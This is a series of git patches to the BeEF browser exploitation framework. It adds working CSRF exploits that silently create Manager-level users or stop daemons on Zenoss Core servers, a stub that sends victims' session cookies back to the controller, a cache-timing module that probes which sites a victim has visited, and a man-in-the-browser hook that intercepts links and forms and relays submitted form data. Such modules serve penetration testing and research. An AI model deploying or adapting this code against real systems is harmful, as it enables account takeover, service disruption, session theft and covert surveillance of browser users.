From 11870710e8c5290be1c649b28d4b1f9552c013a3 Mon Sep 17 00:00:00 2001 From: bcoles Date: Wed, 7 Mar 2012 15:02:12 +1030 Subject: [PATCH 1/9] Added a couple of 0day CSRF exploits for Zenoss Core <= 3.2.1 --- .../exploits/zenoss_add_user_csrf/command.js | 33 +++++++++ .../exploits/zenoss_add_user_csrf/config.yaml | 25 +++++++ .../exploits/zenoss_add_user_csrf/module.rb | 46 ++++++++++++ .../exploits/zenoss_daemon_csrf/command.js | 32 +++++++++ .../exploits/zenoss_daemon_csrf/config.yaml | 25 +++++++ modules/exploits/zenoss_daemon_csrf/module.rb | 70 +++++++++++++++++++ 6 files changed, 231 insertions(+) create mode 100644 modules/exploits/zenoss_add_user_csrf/command.js create mode 100644 modules/exploits/zenoss_add_user_csrf/config.yaml create mode 100644 modules/exploits/zenoss_add_user_csrf/module.rb create mode 100644 modules/exploits/zenoss_daemon_csrf/command.js create mode 100644 modules/exploits/zenoss_daemon_csrf/config.yaml create mode 100644 modules/exploits/zenoss_daemon_csrf/module.rb diff --git a/modules/exploits/zenoss_add_user_csrf/command.js b/modules/exploits/zenoss_add_user_csrf/command.js new file mode 100644 index 000000000..9650a2684 --- /dev/null +++ b/modules/exploits/zenoss_add_user_csrf/command.js @@ -0,0 +1,33 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var base = '<%= @base %>'; + var user_level = '<%= @user_level %>'; + var username = '<%= @username %>'; + var password = '<%= @password %>'; + + var zenoss_add_user_iframe = beef.dom.createInvisibleIframe(); + zenoss_add_user_iframe.setAttribute('src', base+'/zport/dmd/ZenUsers?tableName=userlist&zenScreenName=manageUserFolder.pt&manage_addUser%3Amethod=OK&defaultAdminRole='+user_level+'&roles%3Alist='+user_level+'&userid='+username+'&password='+password); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(zenoss_add_user_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml new file mode 100644 index 000000000..3ae083e7a --- /dev/null +++ b/modules/exploits/zenoss_add_user_csrf/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + zenoss_add_user_csrf: + enable: true + category: "Exploits" + name: "Zenoss Add User CSRF" + description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb new file mode 100644 index 000000000..28fac6d60 --- /dev/null +++ b/modules/exploits/zenoss_add_user_csrf/module.rb @@ -0,0 +1,46 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Zenoss_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, + { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'}, + { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'}, + { 'name' => 'user_level', + 'type' => 'combobox', + 'ui_label' => 'User Level', + 'store_type' => 'arraystore', + 'store_fields' => ['user_level'], + 'store_data' => [ + ['Manager'], + ['ZenManager'], + ['ZenUser'] + ], + 'emptyText' => 'Select a user level ("Manager" is highest)', + 'valueField' => 'user_level', + 'displayField' => 'user_level', + 'mode' => 'local', + 'autoWidth' => true + }, + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/exploits/zenoss_daemon_csrf/command.js new file mode 100644 index 000000000..4b753f8ea --- /dev/null +++ b/modules/exploits/zenoss_daemon_csrf/command.js @@ -0,0 +1,32 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var base = '<%= @base %>'; + var service = '<%= @service %>'; + var action = '<%= @action %>'; + + var zenoss_daemon_iframe = beef.dom.createInvisibleIframe(); + zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(zenoss_daemon_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml new file mode 100644 index 000000000..9249f7d99 --- /dev/null +++ b/modules/exploits/zenoss_daemon_csrf/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + zenoss_daemon_csrf: + enable: true + category: "Exploits" + name: "Zenoss Daemon CSRF" + description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb new file mode 100644 index 000000000..148f0c6bf --- /dev/null +++ b/modules/exploits/zenoss_daemon_csrf/module.rb @@ -0,0 +1,70 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Zenoss_daemon_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, + { 'name' => 'service', + 'type' => 'combobox', + 'ui_label' => 'Daemon', + 'store_type' => 'arraystore', + 'store_fields' => ['service', 'description'], + 'store_data' => [ + ['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'], + ['zopectl', 'zopectl (The Zope open source web application server)'], + ['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'], + ['zenjobs', 'zenjobs (Zenjobs)'], + ['zenping', 'zenping (ICMP ping status monitoring)'], + ['zensyslog', 'zensyslog (Collection of and classification of syslog events)'], + ['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'], + ['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'], + ['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'], + ['zenmodeler', 'zenmodeler (Configuration collection and configuration)'], + ['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'], + ['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'], + ['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'], + ['zenwin', 'zenwin (Windows Service Monitoring (WMI))'], + ['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'], + ['zenjmx', 'zenjmx (ZenJMX)'] + ], + 'emptyText' => 'Select a daemon', + 'valueField' => 'service', + 'displayField' => 'service', #'description', + 'mode' => 'local', + 'autoWidth' => true + }, + { 'name' => 'action', + 'type' => 'combobox', + 'ui_label' => 'Action', + 'store_type' => 'arraystore', + 'store_fields' => ['action'], + 'store_data' => [ + ['Start'],['Stop'],['Restart'] + ], + 'valueField' => 'action', + 'displayField' => 'action', + 'mode' => 'local', + 'autoWidth' => true + } + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end From 05b7eab56cc306009aab0d99eb55f9ba8897cfed Mon Sep 17 00:00:00 2001 From: asaafan Date: Fri, 9 Mar 2012 01:46:11 +0200 Subject: [PATCH 2/9] Delete Skype XSS stub from main branch From ea199f5c552e516ab64112222704c55454c1b7f5 Mon Sep 17 00:00:00 2001 From: unknown Date: Fri, 9 Mar 2012 01:38:37 +0200 Subject: [PATCH 3/9] Adding stub for Skype XSS module --- modules/exploits/skype_xss/command.js | 21 +++++++++++++++++++++ modules/exploits/skype_xss/config.yaml | 25 +++++++++++++++++++++++++ modules/exploits/skype_xss/module.rb | 24 ++++++++++++++++++++++++ 3 files changed, 70 insertions(+) create mode 100644 modules/exploits/skype_xss/command.js create mode 100644 modules/exploits/skype_xss/config.yaml create mode 100644 modules/exploits/skype_xss/module.rb diff --git a/modules/exploits/skype_xss/command.js b/modules/exploits/skype_xss/command.js new file mode 100644 index 000000000..7f0049186 --- /dev/null +++ b/modules/exploits/skype_xss/command.js @@ -0,0 +1,21 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie); + +}); + diff --git a/modules/exploits/skype_xss/config.yaml b/modules/exploits/skype_xss/config.yaml new file mode 100644 index 000000000..fb92775eb --- /dev/null +++ b/modules/exploits/skype_xss/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_cookie: + enable: true + category: "Browser" + name: "Get Cookie" + description: "This module will retrieve the session cookie from the current page." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/skype_xss/module.rb b/modules/exploits/skype_xss/module.rb new file mode 100644 index 000000000..ba0fc1350 --- /dev/null +++ b/modules/exploits/skype_xss/module.rb @@ -0,0 +1,24 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_cookie < BeEF::Core::Command + + def post_execute + content = {} + content['cookie'] = @datastore['cookie'] + save content + end + +end From 76e881dce932d9ceb2611a19dce090edaff27d97 Mon Sep 17 00:00:00 2001 From: asaafan Date: Fri, 9 Mar 2012 01:53:07 +0200 Subject: [PATCH 4/9] Delete Skype XSS stub from main branch --- modules/exploits/skype_xss/command.js | 21 --------------------- modules/exploits/skype_xss/config.yaml | 25 ------------------------- modules/exploits/skype_xss/module.rb | 24 ------------------------ 3 files changed, 70 deletions(-) delete mode 100644 modules/exploits/skype_xss/command.js delete mode 100644 modules/exploits/skype_xss/config.yaml delete mode 100644 modules/exploits/skype_xss/module.rb diff --git a/modules/exploits/skype_xss/command.js b/modules/exploits/skype_xss/command.js deleted file mode 100644 index 7f0049186..000000000 --- a/modules/exploits/skype_xss/command.js +++ /dev/null @@ -1,21 +0,0 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie); - -}); - diff --git a/modules/exploits/skype_xss/config.yaml b/modules/exploits/skype_xss/config.yaml deleted file mode 100644 index fb92775eb..000000000 --- a/modules/exploits/skype_xss/config.yaml +++ /dev/null @@ -1,25 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -beef: - module: - get_cookie: - enable: true - category: "Browser" - name: "Get Cookie" - description: "This module will retrieve the session cookie from the current page." - authors: ["bcoles"] - target: - working: ["ALL"] diff --git a/modules/exploits/skype_xss/module.rb b/modules/exploits/skype_xss/module.rb deleted file mode 100644 index ba0fc1350..000000000 --- a/modules/exploits/skype_xss/module.rb +++ /dev/null @@ -1,24 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -class Get_cookie < BeEF::Core::Command - - def post_execute - content = {} - content['cookie'] = @datastore['cookie'] - save content - end - -end From f2401d3f39b52125b789564a25c24634a531f5cf Mon Sep 17 00:00:00 2001 From: Keith Lee Date: Fri, 9 Mar 2012 03:16:26 +0800 Subject: [PATCH 5/9] Issue 86 - Working for Firefox. Support for Chrome+Opera+IE still pending. --- modules/browser/get_history/command.js | 233 ++++++++++++++++++++++++ modules/browser/get_history/config.yaml | 25 +++ modules/browser/get_history/module.rb | 24 +++ 3 files changed, 282 insertions(+) create mode 100644 modules/browser/get_history/command.js create mode 100644 modules/browser/get_history/config.yaml create mode 100644 modules/browser/get_history/module.rb diff --git a/modules/browser/get_history/command.js b/modules/browser/get_history/command.js new file mode 100644 index 000000000..d3ffcc482 --- /dev/null +++ b/modules/browser/get_history/command.js @@ -0,0 +1,233 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + + +var hidden_iframe = beef.dom.createInvisibleIframe(); +hidden_iframe.setAttribute('id','f'); +hidden_iframe.setAttribute('name','f'); +hidden_iframe.setAttribute('src','about:blank'); +hidden_iframe.setAttribute('style','opacity: 0.1'); + +var results = ""; +var tries = 0; + +/******************************* + * SUB-MS TIMER IMPLEMENTATION * + *******************************/ +var cycles = 0; +var exec_next = null; + +function timer_interrupt() { + cycles++; + if (exec_next) { + var cmd = exec_next; + exec_next = null; + cmd(); + } +} + +window.addEventListener('message', timer_interrupt, false); + +function sched_call(fn) { + exec_next = fn; + window.postMessage('123', '*'); +} + +/**************** + * SCANNED URLS * + ****************/ +var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] }, + { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] }, + + { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz', + 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] }, + { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] }, + { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] }, + { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] }, + { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css', + 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12', + 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] }, + { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] }, + { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] }, + { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] }, + { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] } +]; + + +/************************* + * CONFIGURABLE SETTINGS * + *************************/ +var TIME_LIMIT = 5; +var MAX_ATTEMPTS = 2; + +/********************** + * MAIN STATE MACHINE * + **********************/ +var log_area; +var target_off = 0; +var attempt = 0; +var confirmed_visited = false; +var current_url, current_name; +var wait_cycles; +var frame_ready = false; +var start, stop, urls; + +/* The frame was just pointed to data:... at this point. Initialize a new test, giving the + frame some time to fully load. */ +function perform_check() { + wait_cycles = 0; + setTimeout(wait_for_read, 1); +} + + +/* Confirm that data:... is loaded correctly. */ +function wait_for_read() { + if (wait_cycles++ > 100) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); + return; + } + if (!frame_ready) { + setTimeout(wait_for_read, 1); + } else { + document.getElementById('f').contentWindow.stop(); + setTimeout(navigate_to_target, 1); + } +} + + +/* Navigate the frame to the target URL. */ +function navigate_to_target() { + cycles = 0; + sched_call(wait_for_noread); + urls++; + document.getElementById("f").src = current_url; +} + +/* The browser is now trying to load the destination URL. Let's see if + we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache + hit. If not, seems like cache miss. In both cases, the navigation + will be aborted by maybe_test_next(). */ + +function wait_for_noread() { + try { + if (document.getElementById('f').contentWindow.location.href == undefined) + { + confirmed_visited = true; + throw 1; + } + if (cycles >= TIME_LIMIT) { + maybe_test_next(); + return; + } + sched_call(wait_for_noread); + } catch (e) { + confirmed_visited = true; + maybe_test_next(); + } +} + + +/* Just a logging helper. */ +function log_text(str, type, cssclass) { + results+="
"; + results+=str; + if(target_off==(targets.length-1)){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results); + setTimeout(reload,5000); + } +} + +function reload(){ + window.location.reload(); +} + +/* Decides what to do next. May schedule another attempt for the same target, + select a new target, or wrap up the scan. */ + +function maybe_test_next() { + + frame_ready = false; + document.getElementById('f').src = 'data:text/html,'; + if (target_off < targets.length) { + if (targets[target_off].category) { + //log_text(targets[target_off].category + ':', 'p', 'category'); + target_off++; + } + if (confirmed_visited) { + log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited'); + } + if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) { + if (!confirmed_visited) + //continue; + log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited'); + confirmed_visited = false; + target_off++; + attempt = 0; + maybe_test_next(); + } else { + current_url = targets[target_off].urls[attempt % targets[target_off].urls.length]; + current_name = targets[target_off].name; + attempt++; + perform_check(); + } + } //else { + //en = (new Date()).getTime(); + //} +} + +/* The handler for "run the test" button on the main page. Dispenses + advice, resets state if necessary. */ +function start_stuff() { + if (navigator.userAgent.indexOf('Firefox/') == -1) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, and probably won\'t work for you.'); + //alert('This proof-of-concept is specific to Firefox, and probably won\'t work for you.\n\n' + + // 'Versions for other browsers can be found here:\n' + + // 'http://lcamtuf.coredump.cx/cachetime/'); + } + else{ + target_off = 0; + attempt = 0; + confirmed_visited = false; + urls = 0; + results = ""; + maybe_test_next(); + } +} + +beef.execute(function() { + urls = undefined; + exec_next = null; + start_stuff(); +}); + + diff --git a/modules/browser/get_history/config.yaml b/modules/browser/get_history/config.yaml new file mode 100644 index 000000000..3cb2ea648 --- /dev/null +++ b/modules/browser/get_history/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_history: + enable: true + category: "Browser" + name: "History Extraction" + description: "This module will retrieve the session cookie from the current page." + authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] + target: + working: ["FF"] diff --git a/modules/browser/get_history/module.rb b/modules/browser/get_history/module.rb new file mode 100644 index 000000000..be20141df --- /dev/null +++ b/modules/browser/get_history/module.rb @@ -0,0 +1,24 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_history < BeEF::Core::Command + + def post_execute + content = {} + content['results'] = @datastore['results'] + save content + end + +end From a0c11fa695ff0783a371506eda90dc17eaf03b0a Mon Sep 17 00:00:00 2001 From: radoen Date: Fri, 9 Mar 2012 16:10:04 +0100 Subject: [PATCH 6/9] Added support to intercept dynamic requests --- core/main/client/mitb.js | 313 ++++++++++++++++++++++++--------------- 1 file changed, 195 insertions(+), 118 deletions(-) diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js index bfad2b6d4..e3db90c00 100644 --- a/core/main/client/mitb.js +++ b/core/main/client/mitb.js @@ -15,121 +15,198 @@ // beef.mitb = { - - cid: null, - curl: null, - - init: function(cid, curl){ - beef.mitb.cid = cid; - beef.mitb.curl = curl; - }, - - // Initializes the hook on anchors and forms. - hook: function(){ - beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);}); - beef.onclose.push(function(event) {beef.mitb.endSession();}); - var anchors = document.getElementsByTagName("a"); - var forms = document.getElementsByTagName("form"); - for(var i=0;i0 && i 0 && i < inputs.length - 1) query += "&"; + switch (inputs[i].type) { + case "submit": + break; + default: + query += inputs[i].name + "=" + inputs[i].value; + break; + } + } + e.preventdefault; + beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]); + history.pushState({ Be:"EF" }, "", form.action); + return false; + } + }, + + // Fetches a hooked form with AJAX + fetchForm:function (url, query, target) { + try { + var y = new XMLHttpRequest(); + y.open('POST', url, false, "beef", "beef"); + y.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + y.onreadystatechange = function () { + if (y.readyState == 4 && y.responseText != "") { + target.innerHTML = y.responseText; + setTimeout(beef.mitb.hook, 10); + } + } + y.send(query); + beef.mitb.sniff("POST: " + url + " [" + query + "]"); + return true; + } catch (x) { + return false; + } + }, + + // Fetches a hooked link with AJAX + fetch:function (url, target) { + try { + var y = new XMLHttpRequest(); + y.open('GET', url, false, "beef", "beef"); + y.onreadystatechange = function () { + if (y.readyState == 4 && y.responseText != "") { + + target.innerHTML = y.responseText; + setTimeout(beef.mitb.hook, 10); + } + } + y.send(null); + beef.mitb.sniff("GET: " + url); + return true; + } catch (x) { + window.open(url); + beef.mitb.sniff("GET [New Window]: " + url); + return false; + } + }, + + // Relays an entry to the framework + sniff:function (result) { + try { + beef.net.send(beef.mitb.cid, beef.mitb.curl, result); + } catch (x) { + } + return true; + }, + + // Signals the Framework that the user has lost the hook + endSession:function () { + beef.mitb.sniff("Window closed."); + } +} \ No newline at end of file From 847b798e0a1f5d838c58396d8a24dc7471577cb3 Mon Sep 17 00:00:00 2001 From: root Date: Sun, 11 Mar 2012 11:38:47 -0400 Subject: [PATCH 7/9] Fix Issue 88 - Working for IE and Firefox --- modules/browser/get_history/command.js | 276 ++++++++++++++++-------- modules/browser/get_history/config.yaml | 4 +- modules/browser/get_history/module.rb | 1 + 3 files changed, 193 insertions(+), 88 deletions(-) diff --git a/modules/browser/get_history/command.js b/modules/browser/get_history/command.js index d3ffcc482..a7f286c19 100644 --- a/modules/browser/get_history/command.js +++ b/modules/browser/get_history/command.js @@ -14,7 +14,6 @@ // limitations under the License. // - var hidden_iframe = beef.dom.createInvisibleIframe(); hidden_iframe.setAttribute('id','f'); hidden_iframe.setAttribute('name','f'); @@ -24,6 +23,9 @@ hidden_iframe.setAttribute('style','opacity: 0.1'); var results = ""; var tries = 0; +var isIE = 0; +var isFF = 0; + /******************************* * SUB-MS TIMER IMPLEMENTATION * *******************************/ @@ -39,56 +41,104 @@ function timer_interrupt() { } } -window.addEventListener('message', timer_interrupt, false); + +if (beef.browser.isFF() == 1) { + window.addEventListener('message', timer_interrupt, false); + + /**************** + * SCANNED URLS * + ****************/ + var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 